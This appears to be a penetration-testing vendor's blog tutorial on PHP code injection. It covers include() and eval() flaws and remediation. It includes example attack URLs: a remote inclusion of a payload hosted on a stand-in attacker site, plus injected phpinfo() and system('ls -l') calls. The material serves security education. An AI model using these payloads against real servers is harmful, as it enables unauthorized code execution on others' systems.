THREE PEAT
GigaOm Names Cobalt an “Outperformer” for Third Consecutive Year in Annual Radar Report for PTaaS.
THREE PEAT
GigaOm Names Cobalt an “Outperformer” for Third Consecutive Year in Annual Radar Report for PTaaS.

A Pentester’s Guide to Code Injection

Learn about code injection vulnerabilities with the Pentester’s Guide to Code Injection.

What is Code Injection

OWASP defines Code Injection as a general term for any attack type that consists of injecting code that is then interpreted and executed by the application. This type of attack exploits the poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation such as:

  • allowed characters (standard regular expressions classes or custom)
  • data format
  • amount of expected data

Code Injection differs from Command Injection in that an attacker is limited only by the functionality of the injected language itself. If an attacker can inject and execute PHP code into an application, then they are only limited by the capabilities of PHP. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.

How Does It Work?

Scenario 1: PHP include() function

In this scenario, the PHP include() function is in use with no input validation.

http://vulnerable-site.com/?path=support.php

To exploit the vulnerability, we will be storing our payload in an external server to call the external file and execute on the vulnerable server:

http://vulnerable-site.com/?path=http://attacker-website/paylaod.php

Scenario 2: PHP eval() function

In this example, the vulnerable PHP eval() function is in use which provides a quick and convenient way of executing string values as PHP code, especially in the initial phases of development or for debugging which will cause the code injection. The source code looks like the following:

<?php eval ("echo ".$_REQUEST["parameter"].";"); ?>

The parameter is being passed to the URL as the following:

http://vulnerable-site.com/?parameter=value

An attacker who is aware of eval() function in use (can be revealed via error messages) can send the following payload to exploit the vulnerability:

http://vulnerable-site.com/?parameter=value;phpinfo();

If successful, phpinfo() will be executed after ‘echo’ing the parameter value and will provide information about the configuration details.

Moreover, in case system() function is also enabled, this can allow the attacker to execute arbitrary commands as below:

http://vulnerable-site.com/?parameter=value;system('ls -l');

What’s the Impact of Code Injection

In case the malicious code of the user input is processed unsafely, the vulnerability allows execution of the code. This can lead to arbitrary code execution on the server or to run system commands on the server which leads to command injection attacks. Based on the current privileges, the attack can result in gaining an interactive shell on the vulnerable system.

Code Injection Cheatsheet

Screen Shot 2022-08-29 at 4.46.17 PM

Screen Shot 2022-08-29 at 4.46.39 PM
Screen Shot 2022-08-29 at 4.46.57 PM

Msfvenom

Screen Shot 2022-08-29 at 4.49.34 PM


Remediation

To avoid and remediate code injection you can do the following:

  • Validation/Sanitization on User Input: Data from all potentially untrusted sources should be subject to input validation, including not only Internet-facing web clients but also backend feeds over extranets, from suppliers, partners, vendors or regulators, each of which may be compromised on their own and start sending malformed data.
  • Avoid using vulnerable functions in the code: It’s also possible to test the code using automated tools to identify unsafe functions and possible vulnerabilities.
  • PS: Commonly disabled functions for PHP include: exec(), passthru(), shell_exec(), system(), proc_open(), popen(), curl_exec(), curl_multi_exec(), parse_ini_file(), and show_source().

If you’re looking for a more detailed walk through on how to exploit Code Injection check out my latest video:

Also, read more Pentester's Guides with the Guide to Command Injection available here or the Guide to SSRF available here.

Back to Blog
About Busra Demir
Busra is a former Lead Cobalt Core Pentester with a passion for offensive security research, capture the flag exercises, and certifications. She has currently completed her OSCE, OSCP, and OSWP certifications. More By Busra Demir
A Pentester's Guide to Server Side Template Injection (SSTI)
Server-side template injection is a vulnerability where the attacker injects malicious input into a template to execute commands on the server-side.
Blog
Dec 24, 2020
A Pentester’s Guide to Command Injection
Get expert insights with a command injection tutorial with insights from pentesting experts at Cobalt, a Pentest as a Service (PtaaS) provider.
Blog
Dec 11, 2020